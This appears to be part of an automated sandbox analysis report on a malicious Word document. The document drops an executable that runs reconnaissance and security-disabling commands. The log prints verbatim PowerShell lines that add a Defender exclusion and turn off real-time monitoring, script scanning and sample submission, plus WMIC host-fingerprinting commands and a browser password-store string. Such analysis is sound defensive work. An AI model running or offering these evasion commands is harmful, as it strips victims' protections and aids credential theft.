                  Source: vhcst.exe.0.dr, -----.csSecurity API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
                  Source: vhcst.exe.0.dr, -----.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                  Source: SYTv5.scr.6.dr, -------.csSuspicious method names: ._0B96_F249_E24A_EEF3_E3CD_0C3A_FFFD.GetPayload
                  Source: vhcst.exe0.0.dr, -------.csSuspicious method names: ._0B96_F249_E24A_EEF3_E3CD_0C3A_FFFD.GetPayload
                  Source: vhcst.exe.0.dr, -------.csSuspicious method names: ._0B96_F249_E24A_EEF3_E3CD_0C3A_FFFD.GetPayload
                  Source: classification engineClassification label: mal100.adwa.spyw.expl.evad.winDOC@31/256@3/3
                  Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEFile created: C:\Program Files (x86)\Microsoft Office\root\vfs\Common AppData\Microsoft\Office\Heartbeat\HeartbeatCache.xmlJump to behavior
                  Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEFile created: C:\Users\user\AppData\Roaming\Microsoft\OfficeJump to behavior
                  Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1448:120:WilError_03
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
                  Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5444:120:WilError_03
                  Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4280:120:WilError_03
                  Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8152:120:WilError_03
                  Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8128:120:WilError_03
                  Source: C:\7037005\vhcst.exeMutant created: \Sessions\1\BaseNamedObjects\X3mJzsEkbOmrWkYXVcMh
                  Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7940:120:WilError_03
                  Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2932:120:WilError_03
                  Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7748:120:WilError_03
                  Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEFile created: C:\Users\user\AppData\Local\Temp\{C924DA62-D5EB-47E9-8B9D-A5267BEF87BC} - OProcSessId.datJump to behavior
                  Source: 5QnwxSJVyX.docOLE indicator, Word Document stream: true
                  Source: Element design set.dotx.0.drOLE indicator, Word Document stream: true
                  Source: Equations.dotx.0.drOLE indicator, Word Document stream: true
                  Source: Text Sidebar (Annual Report Red and Black design).docx.0.drOLE indicator, Word Document stream: true
                  Source: Insight design set.dotx.0.drOLE indicator, Word Document stream: true
                  Source: ~WRD0000.tmp.0.drOLE indicator, Word Document stream: true
                  Source: 5QnwxSJVyX.docOLE document summary: title field not present or empty
                  Source: f01b4d95cf55d32a.automaticDestinations-ms.0.drOLE document summary: title field not present or empty
                  Source: f01b4d95cf55d32a.automaticDestinations-ms.0.drOLE document summary: author field not present or empty
                  Source: f01b4d95cf55d32a.automaticDestinations-ms.0.drOLE document summary: edited time not present or 0
                  Source: ~WRF{BAF6D361-EABD-43BD-AF80-06993D3F99C2}.tmp.0.drOLE document summary: title field not present or empty
                  Source: ~WRF{BAF6D361-EABD-43BD-AF80-06993D3F99C2}.tmp.0.drOLE document summary: author field not present or empty
                  Source: ~WRF{BAF6D361-EABD-43BD-AF80-06993D3F99C2}.tmp.0.drOLE document summary: edited time not present or 0
                  Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEFile read: C:\Users\desktop.iniJump to behavior
                  Source: C:\2716439\vhcst.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                  Source: C:\7037005\vhcst.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                  Source: vhcst.exe, 00000006.00000002.2223963813.0000021F83946000.00000004.00000800.00020000.00000000.sdmp, uSbBLfFhIO6EyIF.6.drBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
                  Source: 5QnwxSJVyX.docVirustotal: Detection: 50%
                  Source: unknownProcess created: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE "C:\Program Files (x86)\Microsoft Office\Root\Office16\WINWORD.EXE" /Automation -Embedding
                  Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess created: C:\2716439\vhcst.exe "C:\2716439\vhcst.exe"
                  Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess created: C:\7037005\vhcst.exe "C:\7037005\vhcst.exe"
                  Source: C:\7037005\vhcst.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" Add-MpPreference -ExclusionPath 'C:\7037005\vhcst.exe'
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\wbem\WmiPrvSE.exe C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
                  Source: C:\7037005\vhcst.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                  Source: C:\7037005\vhcst.exeProcess created: C:\Windows\System32\wbem\WMIC.exe "wmic.exe" os get Caption
                  Source: C:\Windows\System32\wbem\WMIC.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                  Source: C:\7037005\vhcst.exeProcess created: C:\Windows\System32\wbem\WMIC.exe "wmic.exe" computersystem get totalphysicalmemory
                  Source: C:\Windows\System32\wbem\WMIC.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                  Source: C:\7037005\vhcst.exeProcess created: C:\Windows\System32\wbem\WMIC.exe "wmic.exe" csproduct get uuid
                  Source: C:\Windows\System32\wbem\WMIC.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                  Source: C:\7037005\vhcst.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                  Source: C:\7037005\vhcst.exeProcess created: C:\Windows\System32\wbem\WMIC.exe "wmic" path win32_VideoController get name
                  Source: C:\Windows\System32\wbem\WMIC.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                  Source: C:\7037005\vhcst.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" Get-WmiObject -Namespace "Root\SecurityCenter2" -Class AntiVirusProduct | Select-Object -ExpandProperty displayName
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                  Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess created: unknown unknownJump to behavior
                  Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess created: C:\2716439\vhcst.exe "C:\2716439\vhcst.exe" Jump to behavior
                  Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess created: C:\7037005\vhcst.exe "C:\7037005\vhcst.exe" Jump to behavior
                  Source: C:\7037005\vhcst.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" Add-MpPreference -ExclusionPath 'C:\7037005\vhcst.exe'Jump to behavior
                  Source: C:\7037005\vhcst.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2Jump to behavior
                  Source: C:\7037005\vhcst.exeProcess created: C:\Windows\System32\wbem\WMIC.exe "wmic.exe" os get CaptionJump to behavior
                  Source: C:\7037005\vhcst.exeProcess created: C:\Windows\System32\wbem\WMIC.exe "wmic.exe" computersystem get totalphysicalmemoryJump to behavior
                  Source: C:\7037005\vhcst.exeProcess created: C:\Windows\System32\wbem\WMIC.exe "wmic.exe" csproduct get uuidJump to behavior
                  Source: C:\7037005\vhcst.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIERJump to behavior
                  Source: C:\7037005\vhcst.exeProcess created: C:\Windows\System32\wbem\WMIC.exe "wmic" path win32_VideoController get nameJump to behavior
                  Source: C:\7037005\vhcst.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" Get-WmiObject -Namespace "Root\SecurityCenter2" -Class AntiVirusProduct | Select-Object -ExpandProperty displayNameJump to behavior
                  Source: C:\2716439\vhcst.exeSection loaded: mscoree.dllJump to behavior
                  Source: C:\2716439\vhcst.exeSection loaded: apphelp.dllJump to behavior
                  Source: C:\2716439\vhcst.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\2716439\vhcst.exeSection loaded: version.dllJump to behavior
                  Source: C:\2716439\vhcst.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                  Source: C:\2716439\vhcst.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                  Source: C:\2716439\vhcst.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                  Source: C:\7037005\vhcst.exeSection loaded: mscoree.dllJump to behavior
                  Source: C:\7037005\vhcst.exeSection loaded: apphelp.dllJump to behavior
                  Source: C:\7037005\vhcst.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\7037005\vhcst.exeSection loaded: version.dllJump to behavior
                  Source: C:\7037005\vhcst.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                  Source: C:\7037005\vhcst.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                  Source: C:\7037005\vhcst.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                  Source: C:\7037005\vhcst.exeSection loaded: windows.storage.dllJump to behavior
                  Source: C:\7037005\vhcst.exeSection loaded: wldp.dllJump to behavior
                  Source: C:\7037005\vhcst.exeSection loaded: profapi.dllJump to behavior
                  Source: C:\7037005\vhcst.exeSection loaded: cryptsp.dllJump to behavior
                  Source: C:\7037005\vhcst.exeSection loaded: rsaenh.dllJump to behavior
                  Source: C:\7037005\vhcst.exeSection loaded: cryptbase.dllJump to behavior
                  Source: C:\7037005\vhcst.exeSection loaded: iphlpapi.dllJump to behavior
                  Source: C:\7037005\vhcst.exeSection loaded: dnsapi.dllJump to behavior
                  Source: C:\7037005\vhcst.exeSection loaded: dhcpcsvc6.dllJump to behavior
                  Source: C:\7037005\vhcst.exeSection loaded: dhcpcsvc.dllJump to behavior
                  Source: C:\7037005\vhcst.exeSection loaded: winnsi.dllJump to behavior
                  Source: C:\7037005\vhcst.exeSection loaded: rasapi32.dllJump to behavior
                  Source: C:\7037005\vhcst.exeSection loaded: rasman.dllJump to behavior
                  Source: C:\7037005\vhcst.exeSection loaded: rtutils.dllJump to behavior
                  Source: C:\7037005\vhcst.exeSection loaded: mswsock.dllJump to behavior
                  Source: C:\7037005\vhcst.exeSection loaded: winhttp.dllJump to behavior
                  Source: C:\7037005\vhcst.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                  Source: C:\7037005\vhcst.exeSection loaded: rasadhlp.dllJump to behavior
                  Source: C:\7037005\vhcst.exeSection loaded: fwpuclnt.dllJump to behavior
                  Source: C:\7037005\vhcst.exeSection loaded: secur32.dllJump to behavior
                  Source: C:\7037005\vhcst.exeSection loaded: sspicli.dllJump to behavior
                  Source: C:\7037005\vhcst.exeSection loaded: schannel.dllJump to behavior
                  Source: C:\7037005\vhcst.exeSection loaded: mskeyprotect.dllJump to behavior
                  Source: C:\7037005\vhcst.exeSection loaded: ntasn1.dllJump to behavior
                  Source: C:\7037005\vhcst.exeSection loaded: ncrypt.dllJump to behavior
                  Source: C:\7037005\vhcst.exeSection loaded: ncryptsslp.dllJump to behavior
                  Source: C:\7037005\vhcst.exeSection loaded: msasn1.dllJump to behavior
                  Source: C:\7037005\vhcst.exeSection loaded: gpapi.dllJump to behavior
                  Source: C:\7037005\vhcst.exeSection loaded: ntmarta.dllJump to behavior
                  Source: C:\7037005\vhcst.exeSection loaded: dpapi.dllJump to behavior
                  Source: C:\7037005\vhcst.exeSection loaded: uxtheme.dllJump to behavior
                  Source: C:\7037005\vhcst.exeSection loaded: windowscodecs.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dll
                  Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: fastprox.dll
                  Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: ncobjapi.dll
                  Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wbemcomn.dll
                  Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wbemcomn.dll
                  Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: kernel.appcore.dll
                  Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: mpclient.dll
                  Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: userenv.dll
                  Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: version.dll
                  Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: msasn1.dll
                  Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wmitomi.dll
                  Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: mi.dll
                  Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: miutils.dll
                  Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: miutils.dll
                  Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: gpapi.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
                  Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: iphlpapi.dll
                  Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: framedynos.dll
                  Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: sspicli.dll
                  Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: kernel.appcore.dll
                  Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: wbemcomn.dll
                  Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: msxml6.dll
                  Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: urlmon.dll
                  Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: iertutil.dll
                  Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: srvcli.dll
                  Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: netutils.dll
                  Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: uxtheme.dll
                  Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vcruntime140.dll
                  Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vcruntime140_1.dll
                  Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: amsi.dll
                  Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: userenv.dll
                  Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: profapi.dll
                  Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vbscript.dll
                  Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: sxs.dll
                  Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: iphlpapi.dll
                  Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: framedynos.dll
                  Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: sspicli.dll
                  Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: kernel.appcore.dll
                  Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: wbemcomn.dll
                  Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: msxml6.dll
                  Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: urlmon.dll
                  Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: iertutil.dll
                  Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: srvcli.dll
                  Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: netutils.dll
                  Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: uxtheme.dll
                  Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vcruntime140.dll
                  Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vcruntime140_1.dll
                  Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: amsi.dll
                  Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: userenv.dll
                  Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: profapi.dll
                  Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vbscript.dll
                  Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: sxs.dll
                  Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: iphlpapi.dll
                  Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: framedynos.dll
                  Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: sspicli.dll
                  Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: kernel.appcore.dll
                  Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: wbemcomn.dll
                  Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: msxml6.dll
                  Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: urlmon.dll
                  Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: iertutil.dll
                  Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: srvcli.dll
                  Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: netutils.dll
                  Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: uxtheme.dll
                  Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vcruntime140.dll
                  Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vcruntime140_1.dll
                  Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: amsi.dll
                  Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: userenv.dll
                  Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: profapi.dll
                  Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vbscript.dll
                  Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: sxs.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
                  Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: iphlpapi.dll
                  Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: framedynos.dll
                  Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: sspicli.dll
                  Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: kernel.appcore.dll
                  Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: wbemcomn.dll
                  Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: msxml6.dll
                  Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: urlmon.dll
                  Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: iertutil.dll
                  Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: srvcli.dll
                  Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: netutils.dll
                  Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: uxtheme.dll
                  Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vcruntime140.dll
                  Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vcruntime140_1.dll
                  Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: amsi.dll
                  Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: userenv.dll
                  Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: profapi.dll
                  Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vbscript.dll
                  Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: sxs.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
